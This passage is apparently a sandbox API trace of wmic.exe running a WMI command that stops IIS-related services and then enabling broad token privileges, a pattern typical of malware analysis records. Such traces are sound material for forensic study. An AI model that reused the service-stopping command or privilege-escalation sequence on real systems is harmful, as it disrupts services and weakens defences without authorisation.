'%%IISADMIN%%'\" call stopservice") returned 69 [0297.736] malloc (_Size=0xa) returned 0x78ade0 [0297.736] lstrlenW (lpString="call") returned 4 [0297.736] _wcsicmp (_String1="call", _String2="\"NULL\"") returned 65 [0297.736] malloc (_Size=0xa) returned 0x78acf0 [0297.736] malloc (_Size=0x18) returned 0x782ce0 [0297.736] memmove_s (in: _Destination=0x782ce0, _DestinationSize=0x10, _Source=0x78adb0, _SourceSize=0x10 | out: _Destination=0x782ce0) returned 0x0 [0297.736] free (_Block=0x78adb0) [0297.736] free (_Block=0x0) [0297.736] free (_Block=0x78ade0) [0297.736] lstrlenW (lpString=" path Win32_Service where \"name like '%%IISADMIN%%'\" call stopservice") returned 69 [0297.736] malloc (_Size=0x18) returned 0x782c00 [0297.736] lstrlenW (lpString="stopservice") returned 11 [0297.736] _wcsicmp (_String1="stopservice", _String2="\"NULL\"") returned 81 [0297.736] malloc (_Size=0x18) returned 0x782aa0 [0297.737] free (_Block=0x0) [0297.737] free (_Block=0x782c00) [0297.737] malloc (_Size=0x18) returned 0x782d00 [0297.737] lstrlenW (lpString="QUIT") returned 4 [0297.737] lstrlenW (lpString="path") returned 4 [0297.737] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="QUIT", cchCount2=4) returned 1 [0297.737] lstrlenW (lpString="EXIT") returned 4 [0297.737] lstrlenW (lpString="path") returned 4 [0297.737] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="EXIT", cchCount2=4) returned 3 [0297.737] free (_Block=0x782d00) [0297.737] WbemLocator:IUnknown:AddRef (This=0x6148b8) returned 0x2 [0297.737] malloc (_Size=0x18) returned 0x782b40 [0297.737] lstrlenW (lpString="/") returned 1 [0297.737] lstrlenW (lpString="path") returned 4 [0297.737] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0297.737] lstrlenW (lpString="-") returned 1 [0297.737] lstrlenW (lpString="path") returned 4 [0297.737] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0297.737] lstrlenW (lpString="CLASS") returned 5 [0297.737] lstrlenW (lpString="path") returned 4 [0297.737] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="CLASS", cchCount2=5) returned 3 [0297.737] lstrlenW (lpString="PATH") returned 4 [0297.737] lstrlenW (lpString="path") returned 4 [0297.737] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="PATH", cchCount2=4) returned 2 [0297.737] lstrlenW (lpString="/") returned 1 [0297.738] lstrlenW (lpString="Win32_Service") returned 13 [0297.738] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="/", cchCount2=1) returned 3 [0297.738] lstrlenW (lpString="-") returned 1 [0297.738] lstrlenW (lpString="Win32_Service") returned 13 [0297.738] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="-", cchCount2=1) returned 3 [0297.738] lstrlenW (lpString="Win32_Service") returned 13 [0297.738] malloc (_Size=0x1c) returned 0x789da8 [0297.738] lstrlenW (lpString="Win32_Service") returned 13 [0297.738] wcstok (in: _String="Win32_Service", _Delimiter=".", _Context=0xb4090c43 | out: _String="Win32_Service", _Context=0xb4090c43) returned="Win32_Service" [0297.738] lstrlenW (lpString="Win32_Service") returned 13 [0297.738] malloc (_Size=0x1c) returned 0x78b188 [0297.738] lstrlenW (lpString="Win32_Service") returned 13 [0297.738] wcstok (in: _String=0x0, _Delimiter=",", _Context=0xb4090c43 | out: _String=0x0, _Context=0xb4090c43) returned 0x0 [0297.738] lstrlenW (lpString="") returned 0 [0297.738] lstrlenW (lpString="WHERE") returned 5 [0297.738] lstrlenW (lpString="where") returned 5 [0297.738] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0297.738] lstrlenW (lpString="/") returned 1 [0297.738] lstrlenW (lpString="name like '%%IISADMIN%%'") returned 24 [0297.738] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%IISADMIN%%'", cchCount1=24, lpString2="/", cchCount2=1) returned 3 [0297.739] lstrlenW (lpString="-") returned 1 [0297.739] lstrlenW (lpString="name like '%%IISADMIN%%'") returned 24 [0297.739] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%IISADMIN%%'", cchCount1=24, lpString2="-", cchCount2=1) returned 3 [0297.739] lstrlenW (lpString="name like '%%IISADMIN%%'") returned 24 [0297.739] malloc (_Size=0x32) returned 0x78b208 [0297.739] lstrlenW (lpString="name like '%%IISADMIN%%'") returned 24 [0297.739] lstrlenW (lpString="/") returned 1 [0297.739] lstrlenW (lpString="call") returned 4 [0297.739] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0297.739] lstrlenW (lpString="-") returned 1 [0297.739] lstrlenW (lpString="call") returned 4 [0297.739] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0297.739] lstrlenW (lpString="call") returned 4 [0297.739] malloc (_Size=0xa) returned 0x78adb0 [0297.739] lstrlenW (lpString="call") returned 4 [0297.739] lstrlenW (lpString="GET") returned 3 [0297.739] lstrlenW (lpString="call") returned 4 [0297.739] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0297.739] lstrlenW (lpString="LIST") returned 4 [0297.739] lstrlenW (lpString="call") returned 4 [0297.739] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0297.739] lstrlenW (lpString="SET") returned 3 [0297.739] lstrlenW (lpString="call") returned 4 [0297.739] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0297.739] lstrlenW (lpString="CREATE") returned 6 [0297.739] lstrlenW (lpString="call") returned 4 [0297.739] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0297.739] lstrlenW (lpString="CALL") returned 4 [0297.740] lstrlenW (lpString="call") returned 4 [0297.740] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0297.740] lstrlenW (lpString="/") returned 1 [0297.740] lstrlenW (lpString="stopservice") returned 11 [0297.740] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0297.740] lstrlenW (lpString="-") returned 1 [0297.740] lstrlenW (lpString="stopservice") returned 11 [0297.740] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0297.740] lstrlenW (lpString="stopservice") returned 11 [0297.740] malloc (_Size=0x18) returned 0x782cc0 [0297.740] lstrlenW (lpString="stopservice") returned 11 [0297.740] ??0CHString@@QAE@XZ () returned 0x19d80c [0297.740] GetCurrentThreadId () returned 0x115c [0297.740] GetCurrentThreadId () returned 0x115c [0297.740] ??0CHString@@QAE@XZ () returned 0x19d794 [0297.740] malloc (_Size=0x4) returned 0x782ee8 [0297.740] malloc (_Size=0xc) returned 0x78ade0 [0297.740] malloc (_Size=0xc) returned 0x78ae70 [0297.740] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6148b8, strNetworkResource="root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68518 | out: ppNamespace=0xa68518*=0x61b088) returned 0x0 [0297.789] free (_Block=0x78ae70) [0297.789] CoSetProxyBlanket (pProxy=0x61b088, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0297.789] free (_Block=0x782ee8) [0297.790] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0297.790] free (_Block=0x78ade0) [0297.790] malloc (_Size=0xc) returned 0x78ade0 [0297.790] IWbemServices:GetObject (in: This=0x61b088, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x19d824*=0x0, ppCallResult=0x0 | out: ppObject=0x19d824*=0x670360, ppCallResult=0x0) returned 0x0 [0297.873] free (_Block=0x78ade0) [0297.873] IWbemClassObject:BeginMethodEnumeration (This=0x670360, lEnumFlags=0) returned 0x0 [0297.873] IWbemClassObject:NextMethod (in: This=0x670360, lFlags=0, pstrName=0x19d830*=0x0, ppInSignature=0x19d82c*=0x0, ppOutSignature=0x19d828*=0x0 | out: pstrName=0x19d830*="StartService", ppInSignature=0x19d82c*=0x0, ppOutSignature=0x19d828*=0x647500) returned 0x0 [0297.874] lstrlenW (lpString="StartService") returned 12 [0297.874] lstrlenW (lpString="stopservice") returned 11 [0297.874] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0297.874] IUnknown:Release (This=0x647500) returned 0x0 [0297.874] IWbemClassObject:NextMethod (in: This=0x670360, lFlags=0, pstrName=0x19d830*=0x0, ppInSignature=0x19d82c*=0x0, ppOutSignature=0x19d828*=0x0 | out: pstrName=0x19d830*="StopService", ppInSignature=0x19d82c*=0x0, ppOutSignature=0x19d828*=0x647500) returned 0x0 [0297.875] lstrlenW (lpString="StopService") returned 11 [0297.875] lstrlenW (lpString="stopservice") returned 11 [0297.875] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0297.875] malloc (_Size=0x38) returned 0x78b9b8 [0297.875] ??0CHString@@QAE@XZ () returned 0x19d374 [0297.875] GetCurrentThreadId () returned 0x115c [0297.875] IWbemClassObject:GetNames (in: This=0x647500, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0x19d384 | out: pNames=0x19d384*="\x01ƀ\x04") returned 0x0 [0297.876] SafeArrayGetLBound (in: psa=0x670958, nDim=0x1, plLbound=0x19d370 | out: plLbound=0x19d370) returned 0x0 [0297.876] SafeArrayGetUBound (in: psa=0x670958, nDim=0x1, plUbound=0x19d36c | out: plUbound=0x19d36c) returned 0x0 [0297.876] SafeArrayGetElement (in: psa=0x670958, rgIndices=0x19d378, pv=0x19d388 | out: pv=0x19d388) returned 0x0 [0297.876] malloc (_Size=0x24) returned 0x78b9f8 [0297.876] IWbemClassObject:GetPropertyQualifierSet (in: This=0x647500, wszProperty="ReturnValue", ppQualSet=0x19d298 | out: ppQualSet=0x19d298*=0x61ab48) returned 0x0 [0297.877] malloc (_Size=0xc) returned 0x78ade0 [0297.877] IWbemQualifierSet:Get (in: This=0x61ab48, wszName="CIMTYPE", lFlags=0, pVal=0x19d268*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x19d268*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="uint32", varVal2=0x0), plFlavor=0x0) returned 0x0 [0297.877] free (_Block=0x78ade0) [0297.877] malloc (_Size=0xc) returned 0x78ade0 [0297.877] IWbemClassObject:Get (in: This=0x647500, wszName="ReturnValue", lFlags=0, pVal=0x19d240*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19d27c*=1692260, plFlavor=0x0 | out: pVal=0x19d240*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19d27c*=19, plFlavor=0x0) returned 0x0 [0297.877] malloc (_Size=0xc) returned 0x78ae40 [0297.877] IWbemQualifierSet:Get (in: This=0x61ab48, wszName="read", lFlags=0, pVal=0x19d280*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x19d280*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0297.877] free (_Block=0x78ae40) [0297.878] malloc (_Size=0xc) returned 0x78ae10 [0297.878] IWbemQualifierSet:Get (in: This=0x61ab48, wszName="write", lFlags=0, pVal=0x19d280*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x19d280*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0297.878] free (_Block=0x78ae10) [0297.878] malloc (_Size=0xc) returned 0x78ae10 [0297.878] malloc (_Size=0xc) returned 0x78ae28 [0297.878] IWbemQualifierSet:Get (in: This=0x61ab48, wszName="Description", lFlags=0, pVal=0x19d258*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x19d258*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0297.878] free (_Block=0x78ae28) [0297.878] malloc (_Size=0xc) returned 0x78aed0 [0297.878] lstrlenA (lpString="Not Available") returned 13 [0297.878] malloc (_Size=0x1c) returned 0x78ba28 [0297.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa21d94, cbMultiByte=-1, lpWideCharStr=0x78ba28, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0297.878] free (_Block=0x78ba28) [0297.878] IUnknown:Release (This=0x61ab48) returned 0x0 [0297.878] malloc (_Size=0x24) returned 0x78ba28 [0297.878] malloc (_Size=0xc) returned 0x78aeb8 [0297.878] malloc (_Size=0x24) returned 0x78ba58 [0297.878] malloc (_Size=0x38) returned 0x78ba88 [0297.879] malloc (_Size=0x24) returned 0x78bac8 [0297.879] free (_Block=0x78ba58) [0297.879] free (_Block=0x78ba28) [0297.879] free (_Block=0x78b9f8) [0297.879] free (_Block=0x78ae10) [0297.879] free (_Block=0x78aed0) [0297.879] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0297.879] IWbemClassObject:GetMethodQualifierSet (in: This=0x670360, wszMethod="StopService", ppQualSet=0x19d78c | out: ppQualSet=0x19d78c*=0x644388) returned 0x0 [0297.879] malloc (_Size=0xc) returned 0x78ae70 [0297.879] IWbemQualifierSet:Get (in: This=0x644388, wszName="Implemented", lFlags=0, pVal=0x19d774*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x19d774*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0297.879] free (_Block=0x78ae70) [0297.879] malloc (_Size=0xc) returned 0x78ae28 [0297.879] malloc (_Size=0xc) returned 0x78ae70 [0297.880] IWbemQualifierSet:Get (in: This=0x644388, wszName="Description", lFlags=0, pVal=0x19d764*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x19d764*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error. It returns one of the following integer values:\n0 - The request was accepted.\n1 - The request is not supported.\n2 - The user did not have the necessary access.\n3 - The service cannot be stopped because other services that are running are dependent on it.\n4 - The requested control code is not valid, or it is unacceptable to the service.\n5 - The requested control code cannot be sent to the service because the state of the service (Win32_BaseService:State) is equal to 0, 1, or 2.\n6 - The service has not been started.\n7 - The service did not respond to the start request in a timely fashion.\n8 - Unknown failure when starting the service.\n9 - The directory path to the service executable was not found.\n10 - The service is already running.\n11 - The database to add a new service is locked.\n12 - A dependency for which this service relies on has been removed from the system.\n13 - The service failed to find the service needed from a dependent service.\n14 - The service has been disabled from the system.\n15 - The service does not have the correct authentication to run on the system.\n16 - This service is being removed from the system.\n17 - There is no execution thread for the service.\n18 - There are circular dependencies when starting the service.\n19 - There is a service running under the same name.\n20 - There are invalid characters in the name of the service.\n21 - Invalid parameters have been passed to the service.\n22 - The account, which this service is to run under is either invalid or lacks the permissions to run the service.\n23 - The service exists in the database of services available from the system.\n24 - The service is currently paused in the system.\nOther - For integer values other than those listed above, refer to Win32 error code documentation.", varVal2=0x0), plFlavor=0x0) returned 0x0 [0297.880] free (_Block=0x78ae70) [0297.880] malloc (_Size=0xc) returned 0x78aed0 [0297.880] IUnknown:Release (This=0x644388) returned 0x0 [0297.881] malloc (_Size=0x38) returned 0x78b9f8 [0297.881] malloc (_Size=0x38) returned 0x78ba38 [0297.881] malloc (_Size=0x24) returned 0x78baf8 [0297.881] malloc (_Size=0xc) returned 0x78ae40 [0297.881] malloc (_Size=0x38) returned 0x78bb28 [0297.881] malloc (_Size=0x38) returned 0x78bb68 [0297.881] malloc (_Size=0x24) returned 0x78bba8 [0297.881] malloc (_Size=0x28) returned 0x78bbd8 [0297.881] malloc (_Size=0x38) returned 0x78bc08 [0297.881] malloc (_Size=0x38) returned 0x78bc48 [0297.881] malloc (_Size=0x24) returned 0x78bc88 [0297.881] free (_Block=0x78bba8) [0297.881] free (_Block=0x78bb68) [0297.881] free (_Block=0x78bb28) [0297.881] free (_Block=0x78baf8) [0297.881] free (_Block=0x78ba38) [0297.881] free (_Block=0x78b9f8) [0297.881] IUnknown:Release (This=0x647500) returned 0x0 [0297.881] free (_Block=0x78bac8) [0297.881] free (_Block=0x78ba88) [0297.881] free (_Block=0x78b9b8) [0297.881] IWbemClassObject:NextMethod (in: This=0x670360, lFlags=0, pstrName=0x19d830*=0x0, ppInSignature=0x19d82c*=0x0, ppOutSignature=0x19d828*=0x0 | out: pstrName=0x19d830*="PauseService", ppInSignature=0x19d82c*=0x0, ppOutSignature=0x19d828*=0x647500) returned 0x0 [0297.881] lstrlenW (lpString="PauseService") returned 12 [0297.881] lstrlenW (lpString="stopservice") returned 11 [0297.882] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="PauseService", cchCount2=12) returned 3 [0297.882] IUnknown:Release (This=0x647500) returned 0x0 [0297.882] IWbemClassObject:NextMethod (in: This=0x670360, lFlags=0, pstrName=0x19d830*=0x0, ppInSignature=0x19d82c*=0x0, ppOutSignature=0x19d828*=0x0 | out: pstrName=0x19d830*="ResumeService", ppInSignature=0x19d82c*=0x0, ppOutSignature=0x19d828*=0x647500) returned 0x0 [0297.882] lstrlenW (lpString="ResumeService") returned 13 [0297.882] lstrlenW (lpString="stopservice") returned 11 [0297.882] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ResumeService", cchCount2=13) returned 3 [0297.882] IUnknown:Release (This=0x647500) returned 0x0 [0297.882] IWbemClassObject:NextMethod (in: This=0x670360, lFlags=0, pstrName=0x19d830*=0x0, ppInSignature=0x19d82c*=0x0, ppOutSignature=0x19d828*=0x0 | out: pstrName=0x19d830*="InterrogateService", ppInSignature=0x19d82c*=0x0, ppOutSignature=0x19d828*=0x647500) returned 0x0 [0297.882] lstrlenW (lpString="InterrogateService") returned 18 [0297.882] lstrlenW (lpString="stopservice") returned 11 [0297.882] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="InterrogateService", cchCount2=18) returned 3 [0297.882] IUnknown:Release (This=0x647500) returned 0x0 [0297.882] IWbemClassObject:NextMethod (in: This=0x670360, lFlags=0, pstrName=0x19d830*=0x0, ppInSignature=0x19d82c*=0x0, ppOutSignature=0x19d828*=0x0 | out: pstrName=0x19d830*="UserControlService", ppInSignature=0x19d82c*=0x672c90, ppOutSignature=0x19d828*=0x672e88) returned 0x0 [0297.883] lstrlenW (lpString="UserControlService") returned 18 [0297.883] lstrlenW (lpString="stopservice") returned 11 [0297.883] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="UserControlService", cchCount2=18) returned 1 [0297.883] IUnknown:Release (This=0x672c90) returned 0x0 [0297.883] IUnknown:Release (This=0x672e88) returned 0x0 [0297.883] IWbemClassObject:NextMethod (in: This=0x670360, lFlags=0, pstrName=0x19d830*=0x0, ppInSignature=0x19d82c*=0x0, ppOutSignature=0x19d828*=0x0 | out: pstrName=0x19d830*="Create", ppInSignature=0x19d82c*=0x647500, ppOutSignature=0x19d828*=0x674de8) returned 0x0 [0297.883] lstrlenW (lpString="Create") returned 6 [0297.883] lstrlenW (lpString="stopservice") returned 11 [0297.884] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Create", cchCount2=6) returned 3 [0297.884] IUnknown:Release (This=0x647500) returned 0x0 [0297.884] IUnknown:Release (This=0x674de8) returned 0x0 [0297.884] IWbemClassObject:NextMethod (in: This=0x670360, lFlags=0, pstrName=0x19d830*=0x0, ppInSignature=0x19d82c*=0x0, ppOutSignature=0x19d828*=0x0 | out: pstrName=0x19d830*="Change", ppInSignature=0x19d82c*=0x647500, ppOutSignature=0x19d828*=0x674b68) returned 0x0 [0297.884] lstrlenW (lpString="Change") returned 6 [0297.884] lstrlenW (lpString="stopservice") returned 11 [0297.884] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Change", cchCount2=6) returned 3 [0297.884] IUnknown:Release (This=0x647500) returned 0x0 [0297.884] IUnknown:Release (This=0x674b68) returned 0x0 [0297.884] IWbemClassObject:NextMethod (in: This=0x670360, lFlags=0, pstrName=0x19d830*=0x0, ppInSignature=0x19d82c*=0x0, ppOutSignature=0x19d828*=0x0 | out: pstrName=0x19d830*="ChangeStartMode", ppInSignature=0x19d82c*=0x647500, ppOutSignature=0x19d828*=0x672f88) returned 0x0 [0297.884] lstrlenW (lpString="ChangeStartMode") returned 15 [0297.884] lstrlenW (lpString="stopservice") returned 11 [0297.884] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ChangeStartMode", cchCount2=15) returned 3 [0297.884] IUnknown:Release (This=0x647500) returned 0x0 [0297.884] IUnknown:Release (This=0x672f88) returned 0x0 [0297.885] IWbemClassObject:NextMethod (in: This=0x670360, lFlags=0, pstrName=0x19d830*=0x0, ppInSignature=0x19d82c*=0x0, ppOutSignature=0x19d828*=0x0 | out: pstrName=0x19d830*="Delete", ppInSignature=0x19d82c*=0x0, ppOutSignature=0x19d828*=0x647500) returned 0x0 [0297.885] lstrlenW (lpString="Delete") returned 6 [0297.885] lstrlenW (lpString="stopservice") returned 11 [0297.885] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Delete", cchCount2=6) returned 3 [0297.885] IUnknown:Release (This=0x647500) returned 0x0 [0297.885] IWbemClassObject:NextMethod (in: This=0x670360, lFlags=0, pstrName=0x19d830*=0x0, ppInSignature=0x19d82c*=0x0, ppOutSignature=0x19d828*=0x0 | out: pstrName=0x19d830*="GetSecurityDescriptor", ppInSignature=0x19d82c*=0x0, ppOutSignature=0x19d828*=0x647500) returned 0x0 [0297.885] lstrlenW (lpString="GetSecurityDescriptor") returned 21 [0297.885] lstrlenW (lpString="stopservice") returned 11 [0297.885] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="GetSecurityDescriptor", cchCount2=21) returned 3 [0297.885] IUnknown:Release (This=0x647500) returned 0x0 [0297.885] IWbemClassObject:NextMethod (in: This=0x670360, lFlags=0, pstrName=0x19d830*=0x0, ppInSignature=0x19d82c*=0x0, ppOutSignature=0x19d828*=0x0 | out: pstrName=0x19d830*="SetSecurityDescriptor", ppInSignature=0x19d82c*=0x672c90, ppOutSignature=0x19d828*=0x672e88) returned 0x0 [0297.885] lstrlenW (lpString="SetSecurityDescriptor") returned 21 [0297.885] lstrlenW (lpString="stopservice") returned 11 [0297.885] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="SetSecurityDescriptor", cchCount2=21) returned 3 [0297.885] IUnknown:Release (This=0x672c90) returned 0x0 [0297.885] IUnknown:Release (This=0x672e88) returned 0x0 [0297.886] IWbemClassObject:NextMethod (in: This=0x670360, lFlags=0, pstrName=0x19d830*=0x0, ppInSignature=0x19d82c*=0x0, ppOutSignature=0x19d828*=0x0 | out: pstrName=0x19d830*=0x0, ppInSignature=0x19d82c*=0x0, ppOutSignature=0x19d828*=0x0) returned 0x40005 [0297.886] IUnknown:Release (This=0x670360) returned 0x0 [0297.887] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0297.887] lstrlenW (lpString="SET") returned 3 [0297.887] lstrlenW (lpString="call") returned 4 [0297.887] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0297.887] lstrlenW (lpString="CREATE") returned 6 [0297.887] lstrlenW (lpString="call") returned 4 [0297.887] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0297.887] free (_Block=0x782b40) [0297.887] malloc (_Size=0x4) returned 0x782ee8 [0297.888] lstrlenW (lpString="GET") returned 3 [0297.888] lstrlenW (lpString="call") returned 4 [0297.888] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0297.888] lstrlenW (lpString="LIST") returned 4 [0297.888] lstrlenW (lpString="call") returned 4 [0297.888] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0297.888] lstrlenW (lpString="ASSOC") returned 5 [0297.888] lstrlenW (lpString="call") returned 4 [0297.888] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0297.888] WbemLocator:IUnknown:AddRef (This=0x6148b8) returned 0x3 [0297.888] free (_Block=0x782788) [0297.888] lstrlenW (lpString="") returned 0 [0297.888] lstrlenW (lpString="NQDPDE") returned 6 [0297.888] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0297.888] lstrlenW (lpString="NQDPDE") returned 6 [0297.888] malloc (_Size=0xe) returned 0x78aea0 [0297.888] lstrlenW (lpString="NQDPDE") returned 6 [0297.888] GetCurrentThreadId () returned 0x115c [0297.888] GetCurrentProcess () returned 0xffffffff [0297.888] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x19f908 | out: TokenHandle=0x19f908*=0x2f8) returned 1 [0297.888] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x19f904 | out: TokenInformation=0x0, ReturnLength=0x19f904) returned 0 [0297.888] malloc (_Size=0x118) returned 0x78b9b8 [0297.888] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x78b9b8, TokenInformationLength=0x118, ReturnLength=0x19f904 | out: TokenInformation=0x78b9b8, ReturnLength=0x19f904) returned 1 [0297.888] AdjustTokenPrivileges (in: TokenHandle=0x2f8, DisableAllPrivileges=0, NewState=0x78b9b8*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), 